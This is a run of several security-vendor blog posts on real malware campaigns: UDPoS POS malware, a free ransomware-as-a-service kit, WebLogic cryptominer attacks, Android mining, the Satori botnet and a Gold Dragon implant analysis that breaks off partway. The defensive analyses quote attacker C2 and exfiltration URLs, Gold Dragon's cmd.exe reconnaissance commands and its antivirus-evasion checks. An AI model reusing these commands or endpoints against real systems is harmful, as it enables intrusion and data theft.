Imagine a job that changes every day of your life, where you get to do something new each week – that’s what it’s like working in the cybersecurity industry. For me, this is ideal—smarter adversaries, new challenges, and the constant struggle to predict and prepare for the future of security in information technology makes this feel a lot less like work. However, it’s important to remember that we do this only because people are getting hurt, often literally. And that’s a sobering and humbling perspective. In many scenarios, a successful campaign can have drastic effects on the victims’ lifestyles and finances. In today’s example, the victims, point-of-sale systems, are being attacked by a POS malware and are being targeted for identity and financial theft.

This particular attack leveraged a POS malware dubbed UDPoS, aptly named for its somewhat uncommon data exfiltration method over UDP, specifically via DNS queries. Although this malware is definitely not the first of its kind (see Multigrain POS malware, DNSMessenger), it certainly is an uncommon technique, and intelligent in that many organizations deprioritize DNS traffic for inspection as compared to HTTP and FTP. Coupled with the fact that UDPoS allegedly leverages a popular remote desktop service known as LogMeIn, and you have a malware campaign that could have a broad reach of victims (in this case unpatched or dated POS systems), and a unique ability to avoid detection for data exfiltration.

Although uncommon, and perhaps somewhat covert in its ability to transmit data over DNS, this malware does offer an upside for defenders — attackers will continue to use protocols which do not employ encryption. The move to SSL or other encryption methods for data exfiltration has been surprisingly inconsistent, meaning detection is relatively simple. This makes the need for communication and visibility of these kinds of techniques essential.

As defenders, McAfee’s Advanced Threat Research team actively monitors the threat landscape and tracks both new and current techniques for every stage of malware—from reconnaissance to infection, lateral movement, persistence, command and control, and exfiltration. We will stay closely tuned to determine if this technique grows in popularity or evolves in capabilities.

We are constantly playing a game of cat and mouse with the adversaries. As we adapt, protect, and attempt to predict new methods of malicious activity, we can be certain the same efforts are being made to evade and outsmart us. Our challenge as a security community is to work together, learn from each other, and apply these learnings toward recognizing and mitigating new threats, such as the DNS exfiltration method employed by UDPoS.

To learn more about UDPoS malware and others like it, be sure to follow @McAfee and @McAfee_Labs on Twitter.

The post Inside the Capabilities and Detection of UDPoS Malware appeared first on McAfee Blogs.

Free Ransomware Available on Dark Web

The McAfee Advanced Threat Research team recently analyzed a ransomware-as-a-service threat that is available for free and without registration. This malware was first seen in July 2017 with the extension .shifr. It has now appeared in recent detections with the extension .cypher.

Ransomware-as-a-Service

Ransomware-as-a-service is a cybercrime economic model that allows malware developers to earn money for their creations without the need to distribute their threats. Nontechnical criminals buy their wares and launch the infections, while paying the developers a percentage of their take. The developers run relatively few risks, and their customers do most of the work.

Some ransomware-as-a-service, such as RaaSberry, use subscriptions while others require registration to gain access to the ransomware. The ransomware developer hosts a service on the “dark web” that allows any buyer to create and modify the malware. For example, the buyer can add custom ransom notes and the amount of the payment. More advanced services offer features such as evasion techniques to avoid detection and analysis. The service can also offer a control server with an administration panel to manage each victim. This system is convenient for both the developer, who makes money by selling malware, and for buyers, who gain ready-to-deploy ransomware without needing any specific coding knowledge.

The underground economy behind this service is well organized, effectively offering a cybercrime infrastructure. Basically, the ransomware is available on a website. The buyer sets up the ransomware by adding a wallet address. The ransomware is then available to download. The buyer just needs to customize and spread the malware. When a victim pays the ransom, a percentage is delivered both to the buyer and to the malware coder.

 

The ransomware is available on the TOR network at hxxp://kdvm5fd6tn6jsbwh.onion. A web page guides buyers through the configuration process.

On the configuration page, a generic XMPP address suggests we may have found a demo version of the ransomware.

On the page, the buyer need only to add a Bitcoin wallet address and the amount of the ransom. Once that is done, the malware is generated and can be downloaded. With this malware, the developer earns a 10% commission on every payment. Now let’s look at the malware sample.

Dynamic Analysis 

When the malware launches on the victim’s system, it checks for an Internet connection. If there is none, it exits the process. Otherwise, it contacts the following addresses to download the encryption key:

Once the file is running, it creates several files on the system:

  • Encryption_key: the RSA key encrypted in AES
  • Lock_file: an indicator that the system is encrypted
  • Uuid_file: a reference for the infected machine. A TOR address is generated with this ID.

The encryption key is downloaded from hxxps://kdvm5fd6tn6jsbwh.onion.to/new_c/xmKksHw53W433lmvNsdzGxqWLcPLA44Dyna.

The ransom note is created on the desktop.

The file “HOW_TO_DECRYPT_FILES.html” gives a link to the TOR network.

Once the files are encrypted, the ransom note is displayed in HTML and points to the TOR site hxxp://kdvm5fd6tn6jsbwh.onion/ with the ID of the infected machine.

Allegedly after payment, the victim can download the file decrypter.exe and unlock encrypted files, which have the extension .cypher.

The malware encrypts the following file extensions:

The targeted extensions include many picture and photography files related to Canon, Kodak, Sony, and others. There are also extensions for AutoCAD, Autodesk projects, scalable vector images, and Microsoft Office files. These files are mostly used by designers, photographers, architect—and many others.

Digging Deeper

The malware runs on 64-bit systems and is coded in Golang (“Go language,” from Google), a programming language similar to C with some improvements in error management. It is not common to find malware using Golang, although this is not the first time that we have analyzed such malware. This threat is pretty big compared with most other malware, larger than 5.5MB. The file size can make analysis more difficult and can also help evade hardcoded antimalware file-inspection sizes.

Reverse engineering in Golang is a bit different than other languages. Golang binaries are usually bigger than other executables. (By default, the compiler statically links the program’s libraries, resulting a bigger file.)

A drawback for attackers is that such big binaries can be easily detected on a corporate network. Large files are “noisier” and may appear suspicious when arriving from an external source. They can also be less convenient for attackers to deal with because they can make the infection process more difficult.

The first interesting function to analyze in a Golang binary is the “main_main.” The malware starts by gathering environment variables. It then checks whether the file “lock_file” exists in the directory C:\Users\<username>\AppData\Roaming.

The function “main_Exists” will check for the file. If it does not exist, the malware exits the process.

If the file does exist, the malware downloads the public key from the control server.

The malware contacts the address  hxxps://kdvm5fd6tn6jsbwh.onion/new_c/<nameofmalware>. The encryption public key is stored directly on the website.

This address is generated when the buyer creates the ransomware on the developer’s web page; thus the same malware encrypts files with the same public key.

The malware generates the AES key and tries to find any network share by querying the letters.

This function tries to find network shares:

Before a file is encrypted, the malware creates another file in C:\Users\<username>\AppData\Roaming\uuid_file to use as a victim identifier.

The malware encrypts the files using AES and deletes them after encryption with the function “os.remove” to avoid any simple forensic recovery.

The decrypter, which can be downloaded, works in a similar way but it requests the private key that the victims must pay for at hxxps://kdvm5fd6tn6jsbwh.onion.to/get_privkey/math/big. The mechanism behind the encryption routine seems to be on the online server and the decryption key cannot be easily recovered.

The following information describes the decrypter.

Conclusion

Cybercrime-as-a-service is not new, yet it is now more widespread than ever. In this case, the malware is available for free but the ransomware developer earns a 10% fee from each victim who pays a ransom. The use of Golang is not common for malware. Most ransomware-as-a-service is not free, which could indicate this might be a demonstration version, or a proof of concept for future sale.

This malware is not advanced and was coded without evasion techniques, such as DGA, SSL for control, encryption, or even file compression. Looking at the targeted file extensions suggests the victims can range from general home or business users to the graphics industry. Although such malware is not difficult to analyze, it can be very destructive in a corporate environment.

Keep in mind that paying a ransom is no guarantee of receiving a decryption key. McAfee advises that you never pay a ransom. You can find further information and help on unlocking some ransomware threats at https://www.nomoreransom.org.

McAfee detects this threat as Ransomware-FPDS!0F8CCEE515B8.

 

Indicators of Compromise

Hashes:

  • cb73927aa749f88134ab7874b15df898c014a35d519469f59b1c85d32fa69357
  • 0622fcb172773d8939b451c43902095b0f91877ae05e562c60d0ca0c237a2e9c

IP address:

  • hxxp://kdvm5fd6tn6jsbwh.onion

Files created:

  • C:\Users\<username>\AppData\Roaming\uuid_file
  • C:\Users\<username>\AppData\Roaming\lock_file
  • C:\Users\<username>\AppData\Roaming\encryption_key
  • C:\Users\< username >\Desktop\HOW_TO_DECRYPT_FILES.html

Encryption extension:

  • .cypher

References:

https://www.virustotal.com/en/file/0622fcb172773d8939b451c43902095b0f91877ae05e562c60d0ca0c237a2e9c/analysis/

https://isc.sans.edu/forums/diary/Ransomware+as+a+Service/23277/

 

The post Free Ransomware Available on Dark Web appeared first on McAfee Blogs.

CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining

Introduction

FireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.

CVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a Critical Patch Update that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.

FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.

We saw evidence of organizations located in various countries – including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical – being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.

The recent cryptocurrency boom has resulted in a growing number of operations – employing diverse tactics – aimed at stealing cryptocurrencies. The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.

Tactic #1: Delivering the miner directly to a vulnerable server

Some tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1), and executing it using ShellExecute().


Figure 1: Downloading the payload directly

Tactic #2: Utilizing PowerShell scripts to deliver the miner

Other tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).


Figure 2: Exploit delivering PowerShell script

This script has the following functionalities:

  • Downloading miners from remote servers


Figure 3: Downloading cryptominers

As shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.

  • Creating scheduled tasks for persistence


Figure 4: Creation of scheduled task

  • Deleting scheduled tasks of other known cryptominers


Figure 5: Deletion of scheduled tasks related to other miners

In Figure 4, the cryptominer creates a scheduled task with name “Update service for Oracle products1”.  In Figure 5, a different variant deletes this task and other similar tasks after creating its own, “Update service for Oracle productsa”.  

From this, it’s quite clear that different attackers are fighting over the resources available in the system.

  • Killing processes matching certain strings associated with other cryptominers


Figure 6: Terminating processes directly


Figure 7: Terminating processes matching certain strings

Similar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).

  • Connects to mining pools with wallet key


Figure 8: Connection to mining pools

The miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.

  • Limiting CPU usage to avoid suspicion


Figure 9: Limiting CPU Usage

To avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).

Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue

Some tactics involve spreading laterally across a victim’s environment using dumped Windows credentials and the EternalBlue vulnerability (CVE-2017-0144).

The malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with extracted credentials and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).

The malware also has the capability to perform a Pass-the-Hash attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.

Additionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://<C2>:8000/api.php?data=<credential data>'.

If the lateral movement with credentials fails, then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue, and uses it to spread to that host.

After all network derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host.

Tactic #4: Scenarios observed in Linux OS

We’ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.


Figure 10: Delivery of shell scripts

The shell script performs the following activities:

  • Attempts to kill already running cryptominers


Figure 11: Terminating processes matching certain strings

  • Downloads and executes cryptominer malware


Figure 12: Downloading CryptoMiner

  • Creates a cron job to maintain persistence


Figure 13: Cron job for persistence

  • Tries to kill other potential miners to hog the CPU usage


Figure 14: Terminating other potential miners

The function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.

Conclusion

Use of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. We’ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.

Notably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits.

FireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.

At the time of writing, FireEye HX detects this activity with the following indicators:

Detection Name

POWERSHELL DOWNLOADER (METHODOLOGY)

MONERO MINER (METHODOLOGY)

MIMIKATZ (CREDENTIAL STEALER)

Indicators of Compromise

MD5

Name

3421A769308D39D4E9C7E8CAECAF7FC4

cranberry.exe/logic.exe

B3A831BFA590274902C77B6C7D4C31AE

xmrig.exe/yam.exe

26404FEDE71F3F713175A3A3CEBC619B

1.ps1

D3D10FAA69A10AC754E3B7DDE9178C22

2.ps1

9C91B5CF6ECED54ABB82D1050C5893F2

info3.ps1

3AAD3FABF29F9DF65DCBD0F308FF0FA8

info6.ps1

933633F2ACFC5909C83F5C73B6FC97CC

lower.css

B47DAF937897043745DF81F32B9D7565

lib.css

3542AC729035C0F3DB186DDF2178B6A0

bootstrap.css

Thanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.

Warning: Crypto-Currency Mining is Targeting Your Android

Cryptocurrency, a virtual form of currency designed to work as a secure form of exchange, has gained a lot of traction in the world of finance and technology. But for many, the concept of obtaining cryptocurrency, or “crypto-mining,” is obscure. Investopedia defines crypto-mining as, “the process by which transactions are verified and added to the public ledger, known as the blockchain, and also the means through which new currencies such as Bitcoin and Ethereum are released.”

The practice has been around since 2009, and anyone with access to the Internet, the required programs and hardware can participate in mining. In fact, by the end of this month, Forbes Magazine will have published its first “Top Richest” list dedicated to Crypto Millionaires.

With the rise in popularity of digital currency, it’s no surprise that cybercriminals across the globe are leveraging malicious code to obtain it. Hackers would rather develop or utilize mining malware instead of paying the expensive price tag associated with mining machines, which can be upwards of $5000. In China, the ADB Miner malware is spreading and targeting thousands of Android devices for the primary purpose of mining cryptocurrency. The malware is spread through the publicly accessible Android Debug Bridge (abd) on an opened port 5555. This port is typically closed but can be opened by an ADB debug tool. Once infected, a device will look for other devices with the same vulnerability to spread the malware and leverage other Android-based smartphones, tablets, and televisions for crypto-mining.

So why are cybercriminals now targeting Android mobile devices? This could be due to the fact that hackers know they can easily manipulate vulnerabilities in Google Play’s app vetting system. Last year McAfee Mobile Threat Research identified more than 4,000 apps that were removed from Google Play without notification to users. Currently, the app store does not have consistent or centralized reporting available for app purchasers. Even if an app is supported by Google Play at the time of download, it could later be identified as malicious and Android users may be unaware of the fact that they’re harboring a bad app.

Researchers have found over 600 blacklisted malicious cryptocurrency apps across 20 app stores including Apple and Google Play. Google Play was found to have the highest amount of malicious crypto apps, with 272 available for download. In the United States, researchers have found another crypto-mining malware that is so demanding of phone processors, its causing them to implode. Loapi, a newly-discovered Trojan crypto-miner, can cause phone batteries to swell up and burst open the device’s back cover, and has been found in up to 20 mobile apps.

Crypto-mining malware isn’t a new phenomenon. Before the WannaCry attacks last summer, cryptocurrency malware sprung up as another malicious software looking to take advantage of the same Windows vulnerabilities that WannaCry exploited. But, instead of locking down systems with ransomware, these cybercriminals were putting them to work, using a cryptocurrency mining malware called Adylkuzz.

Here are a few tips to ensure your Android-devices are protected from crypto-mining malware:

  • Download your apps from a legitimate source. While some malicious apps may slip through the cracks, app stores like Google Play do have security measures in place to protect users, and it’s much safer than downloading from an unknown source.
  • Delete any apps that you haven’t used over the past 6-months. An app’s security can change over time; applications that were once supported by an app store can be flagged as malicious and removed from the platform without notification. If an app is no longer supported in the app store, you should delete it immediately.
  • Keep all of your software up to date. Many of the more harmful malware attacks we’ve seen, like the Equifax data breach, take advantage of software vulnerabilities in common applications, such as operating systems and browsers. Having the latest software and application versions ensures that any known bugs or exploits are patched, and is one of the best defenses against viruses and malware.
  • Double up on your mobile security software. I can’t stress enough how important is to use comprehensive security software to protect your personal devices.

Interested in learning more about IoT and mobile security tips and trends? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

 

The post Warning: Crypto-Currency Mining is Targeting Your Android appeared first on McAfee Blogs.

8 Easy Ways to Hack-Proof Your Family’s Smartphones

Smartphones have changed the face of parenting in profound ways. But for all the efficiency they’ve introduced into family life, those same devices simultaneously bring risk.

With smartphone and tablet use growing at ten times the rate of PCs, hackers know precisely where to shift their focus these days. Cyber thieves love smartphones because once inside, they can access private information, location, email, photos, social media, and bank accounts.

If you’re a parent, a smartphone breach is an even bigger deal. Shoring up the security gaps in your phone isn’t a big deal but what about the other four or more smartphones under your roof? If you were to multiply the risk, you’d soon realize the potential havoc that’s looming.

While you can’t shut out every digital risk, you can tackle the most prominent ones. Let’s get started!

8 Ways to Hack-Proof Your Family’s Smartphones

  1. Think Like a Criminal. Work a potential hack backward. Look at every possible entryway into your phone and ask yourself, “How could I get into this phone if I were determined?” Then, methodically lock up each digital door. Challenge yourself to find every security gap. Examine your password strength, social profiles, web browsing security, general and app settings.
  2. Juice Up Your Password. How do you create a password that a criminal can’t hack? With great intention and a few extra layers. 1) Avoid the common error of using easy passwords such as “12345” or “password.” Get complex and create a combination that isn’t logical. 2) Use multi-factor authentication (MFA). Having multiple factors to authenticate your phone use such as your fingerprint, face, or a trusted device, increases security. Most smartphones offer MFA so, even if it seems tedious, use it. The more factors — or digital layers — you can combine, the more protected your smartphone will be. Too many passwords crowding your brain? Consider a password manager.
  3. Trust No App. Not all apps you download to your phone are created equal. Many third-party apps do not go through rigorous security vetting of Google or Apple. Hackers can infect apps with malware or viruses that demolish your phone’s security and allow hackers access to your data. Beware. Examine all apps, read reviews, and steer clear of apps that ask for too much access. Even legitimate apps can be used for malicious purposes such as listening in via a phone’s microphones and even spying using a phone’s camera. To pull back an app’s access, just go to your settings. On Android: Go to Apps and Notifications, choose App Permissions and make changes. On iOS: Go to your settings, select Privacy, and make changes to app permissions accordingly.
  4. Passcode, Track Your Phone. Be proactive in case your phone gets stolen or lost. Make sure your device is passcode and fingerprint protected. Take a few minutes to enable phone tracking. For Android, you’ll download the app Find My Device and for Apple use Find My iPhone. Make sure those apps are always enabled on your phone. If your phone is lost or stolen it can be tracked online.
  5. Log out, Lock Online Services. If you bank, shop, or access sensitive accounts via your smartphone do it with extreme care. This means logging out and locking those accounts when not in use and avoiding using auto-login features. Instead, use a password manager app the forces you to re-enter a master password each time you want to access an account. It’s worth the extra step. An essential part of this equation is disabling keychain and auto-fill in your browser. You can do this by finding your web browser in Settings and toggling each option to OFF. Also, avoid using public Wi-Fi for accessing sensitive accounts or conducting any transactions.
  6. Turn Off Bluetooth. Bluetooth carries inherent vulnerabilities and is another open door for hackers to enter. When Bluetooth is turned on it is constantly looking for other open connections. Hackers work quickly through open Bluetooth connections, and often victims don’t even know there’s been a breach (there’s no evidence a phone has connected with a criminal source). Make sure to switch Bluetooth off if you are not using it.
  7. Take Updates Seriously. Because people design phones, phones will be flawed. And, it’s just a matter of time before a hacker discovers and exploits those flaws. Developers use updates to combat all kinds of breaches, which make them critical to your phone’s security. Along with staying on top of updates, consider the added safeguard of antivirus, identity, and privacy protection that covers all family devices.
  8. Stop! Don’t Click that Link. Unless you are 100% sure of the legitimacy of a link sent to you through text, email, or direct message, do not click it. Random links sent by hackers to access your data are getting more and more sophisticated as well as destructive.

 

toni page birdsong

 

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures). 

The post 8 Easy Ways to Hack-Proof Your Family’s Smartphones appeared first on McAfee Blogs.

Satori Botnet Turns IoT Devices Into Zombies By Borrowing Code from Mirai

Like a zombie rising from the dead, a new botnet is reemerging from the remains of Mirai malware. Specifically, modern-day threat actors are breathing life into a fast-evolving botnet called Satori by repurposing some of the source code from Mirai. And now, Satori is creating zombies of its own, as its been found hijacking internet-connected devices and turning them into an obedient botnet army that can be remotely controlled in unison.

Satori, as of now, is a work in progress. But that also means it’s evolving rapidly. Satori knows that agility equates to survival — we’ve seen it adapt to security measures and transcend its former self time and time again. Researchers have even taken down the main Satori C&C server, only to find the botnet remerge shortly after.

So it’s no surprise that it recently reemerged stronger than ever before. The current version has been found targeting software associated with ARC processors, which are used in a variety of IoT devices. Once it finds a weakness in an IoT device, Satori checks to see if default settings have been changed, and gains control of any machine that still has them. From there, it connects to the larger network and gains control of other devices that may be on it. So far, Satori has only managed to enslave a small number of devices. But once its army becomes large enough, it can be summoned to pump out masses of e-mail spam, incapacitate corporate websites, or even bring down large chunks of the internet itself.

Apparently, Satori doesn’t just take code from Mirai, it takes cues too – as these efforts are reminiscent of the infamous Mirai DDoS attack. But we can take cues from Mirai too in order to prepare for a potential Satori attack. First and foremost, every owner of an IoT device must change the default settings immediately – a necessary security precaution that many don’t take, which gave Mirai the firepower it needed in the first place. From there, users should disable telnet access from the outside and use SSH for remote administration if needed. However, this responsibility falls on the shoulders of manufacturers too, as they should enforce these settings by default. If both users and vendors follow these simple security steps, we can stunt Satori’s growth and stifle its Mirai-inspired ambitions entirely.

To learn more about the Satori botnet, and others like it, be sure to follow @McAfee and @McAfee_Labs on Twitter.

The post Satori Botnet Turns IoT Devices Into Zombies By Borrowing Code from Mirai appeared first on McAfee Blogs.

Meltdown and Spectre Aren’t Done Just Yet – New Malware Uses Exploits to Potentially Attack Browsers

We kicked off 2018 with two powerful new exploits: Meltdown and Spectre. And since the discovery of Meltdown and Spectre on January 3rd, vendors have been hard at work issuing patches to remedy their nasty side effects – with the majority supplying fixes within the first week. But, unfortunately, some malware makers have still found ways to leverage a handful of these exploits. In fact, according to the AV-Test Institute, there are currently 139 malware samples out in the wild that appear to be related to the recently reported CPU exploits and have been designed to attack web browsers running JavaScript.

So, why is this still happening? Though operating system vendors, chip makers, and browser makers have released patches to mitigate the attacks, that doesn’t exactly mean all systems everywhere have been locked down, especially as new malware strains continue to emerge. In fact, the CVE-2017-5715, CVE-2017-5753, and CVE-2017-5754 exploits are still being abused by cybercriminals, who are leveraging them to potentially attack browsers that support JavaScript and WebAssembly.

What’s more – if they successfully infiltrate these browsers, cybercriminals can steal passwords and other personal data. So, it’s crucial users are vigilant and take the necessary precautions to secure their personal info while surfing the web. To do just that, follow these tips:

  • Exit out of your browser window. If you’re not actively using your browser window, close it. This should decrease your chances for attack and also conserve energy in the process.
  • Update everything regularly. Along with updating every type of device impacted by Meltdown and Spectre, be sure to update your browser as soon as an update becomes available. That way, you can apply any additional patches that are created to combat these new malware attacks.
  • Surf the web safely. As I noted in my last post about Meltdown and Spectre, McAfee products are not affected by this exploit. Therefore, after you’ve updated your devices with the latest security software, it’s time to take the next step in personal security by locking down your browser as well. You can do that by installing McAfee WebAdvisor, which acts your own personal safety advisor for your online activity.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Meltdown and Spectre Aren’t Done Just Yet – New Malware Uses Exploits to Potentially Attack Browsers appeared first on McAfee Blogs.

Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems

UPDATE (Feb. 12, 2018): A new variant of the original file-less implant appeared on Feb. 5, 2018, indicating the attack has resumed. The new variant has the same author and metadata as the original documents discovered in December, as well as a nearly identical implant. A key difference, however, is the attackers leveraged hacked servers is Santiago, Chile. See indicators of compromise for this update at the bottom of this post.

ORIGINAL POST (Feb. 2, 2018): McAfee Advanced Threat Research (ATR) recently released a report describing a fileless attack targeting organizations involved with the Pyeongchang Olympics. The attack used a PowerShell implant that established a channel to the attacker’s server to gather basic system-level data. What was not determined at that time was what occurred after the attacker gained access to the victim’s system.

McAfee ATR has now discovered additional implants that are part of an operation to gain persistence for continued data exfiltration and for targeted access. We have named these implants, which appeared in December 2017, Gold Dragon, Brave Prince, Ghost419, and Running Rat, based on phrases in their code.

On December 24, 2017, our analysts observed the Korean-language implant Gold Dragon. We now believe this implant is the second-stage payload in the Olympics attack that ATR discovered January 6, 2018. The PowerShell implant used in the Olympics campaign was a stager based on the PowerShell Empire framework that created an encrypted channel to the attacker’s server. However, this implant required additional modules to be executed to be a fully capable backdoor. In addition, the PowerShell implant did not contain a mechanism to persist beyond a simple scheduled task. Gold Dragon has a much more robust persistence mechanism than the initial PowerShell implant and enables the attacker to do much more to the target system. Gold Dragon reappeared the same day that the Olympics campaign began.

The Gold Dragon malware appears to have expanded capabilities for profiling a target’s system and sending the results to a control server. The PowerShell implant had only basic data-gathering capabilities—such as username, domain, machine name, and network configuration—which are useful only for identifying interesting victims and launching more complex malware against them.

Gold Dragon

Gold Dragon is a data-gathering implant observed in the wild since December 24. Gold Dragon gets its name from the hardcoded domain www.golddragon.com, which we found throughout the samples.

This sample acts as a reconnaissance tool and downloader for subsequent payloads of the malware infection and payload chain. Apart from downloading and executing binaries from the control server, Gold Dragon generates a key to encrypt data that the implant obtains from the system. This URL is not used for control; the encrypted data is sent to the server ink.inkboom.co.kr, which was used by previous implants as early as May 2017.

Gold Dragon contains elements, code, and similar behavior to implants Ghost419 and Brave Prince, which we have tracked since May 2017. A DLL-based implant created on December 21 (the same day the first malicious Olympics document appeared) was downloaded by a Gold Dragon variant created December 24. This variant was created three days before the targeted spear phishing email with the second document that was sent to 333 victim organizations. The December 24 variant of Gold Dragon used the control server nid-help-pchange.atwebpages.com, which was also used by a Brave Prince variant from December 21.

The first variants of Gold Dragon appeared in the wild in South Korea in July 2017. The original Gold Dragon had the file name 한글추출.exe, which translates as Hangul Extraction and was seen exclusively in South Korea. Five variants of Gold Dragon compiled December 24 appeared heavily during the targeting of the Olympics organizations.

Analyzing Gold Dragon

As part of its initialization, Gold Dragon:

  • Builds its imports by dynamically loading multiple APIs from multiple libraries
  • Gains debug privileges (“SeDebugPrivilege”) for its own process to read remote memory residing in other processes

The malware does not establish persistence for itself but for another component (if it is found) on the system:

  • The malware begins by looking for an instance of the Hangul word processor (HWP) running on the system. (HWP is a Korean word processor similar to Microsoft Word.)

Checking for HWP.exe in the process list.

  • If HWP.exe is found running on the system, the malware finds the currently open file in HWP by extracting the file path from the command-line argument passed to HWP.exe
  • This word file (usually named *.hwp) is copied into the temporary file path

C:\DOCUME~1\<username>\LOCALS~1\Temp\2.hwp

  • hwp is an exact copy of the file loaded into HWP.exe
  • The malware reads the contents of 2.hwp and finds an “MZ magic marker” in the file indicated by the string “JOYBERTM”

Checking for the MZ marker in the HWP file.

  • This marker indicates the presence of an encrypted MZ marker in the .hwp file and is decrypted by the malware and written to the Startup folder for the user:

C:\Documents and Settings\<username>\Start Menu\Programs\Startup\viso.exe

  • This step establishes the persistence of the malware across reboots on the endpoint
  • Once the decrypted MZ marker is written to the Startup folder, the 2.hwp is deleted from the endpoint

The malware might perform this activity for a couple of reasons:

  • Establish persistence for itself on the endpoint
  • Establish persistence of another component of the malware on the endpoint
  • Update itself on endpoint after a separate updater component downloads the update from the control server

The malware has limited reconnaissance and data-gathering capabilities and is not full-fledged spyware. Any information gathered from the endpoint is first stored in the following file, encrypted, and sent to the control server:

  • C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

The following information is gathered from the endpoint, stored in the file 1.hwp, and sent to the control server:

  • Directory listing of the user’s Desktop folder using command:

cmd.exe /c dir C:\DOCUME~1\<username>\Desktop\ >> C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

  • Directory listing of the user’s recently accessed files using command:

cmd.exe /c dir C:\DOCUME~1\<username>\Recent >> C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

  • Directory listing of the system’s %programfiles% folder using command:

cmd.exe /c dir C:\PROGRA~1\ >> C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

  • Systeminfo of the endpoint using command:

cmd.exe /c systeminfo >> C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

  • Copies the file ixe000.bin from:

C:\Documents and Settings\<username>\Application Data\Microsoft\Windows\UserProfiles\ixe000.bin

To:

C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

  • Registry key and value information for the current user’s Run key (with information collected):

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Number of subkeys

(<KeyIndex>) <KeyName>

Number of Values under each key including the parent Run key

(<ValueIndex>) <Value_Name> <Value_Content>

Registry Run key enumeration by Gold Dragon.

An example of 1.hwp with registry and system information:

Gold Dragon executes these steps executed in the exfiltration process:

  • Once the malware has gathered the required data from the endpoint, it encrypts the data file 1.hwp using the password “www[dot]GoldDragon[dot]com”
  • The encrypted content is written to the data file 1.hwp.
  • During the exfiltration process, the malware Base64-encodes the encrypted data and sends it to its control server using an HTTP POST request to the URL:

http://ink[dot]inkboom.co.kr/host/img/jpg/post.php

  • HTTP data/parameters used in the request include:
    • Content-Type: multipart/form-data; boundary=—-WebKitFormBoundar ywhpFxMBe19cSjFnG <followed by base64 encoded & encrypted system info>
    • User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)
    • Accept-Language: en-us
    • HTTP Version: HTTP/1.0

The malware can also download and execute additional components served to it by the control server. The mechanism for downloading additional components is based on the Computer Name and UserName of the endpoint provided by the malware process to the control server in the following HTTP GET request:

GET http://ink[dot]inkboom.co.kr/host/img/jpg/download.php?filename=<Computer_Name>_<username>&continue=dnsadmin

After successfully retrieving the component from the control server, the next-stage payload is copied to the Application Data directory of the current user and executed:

C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\hupdate.ex

(note “ex,” not “exe”)

The capability to download additional components from the control server.

The malware demonstrates its evasive behavior by checking for the presence of specific processes related to antimalware products:

  • The presence of any process with the keywords “v3” and “cleaner.”

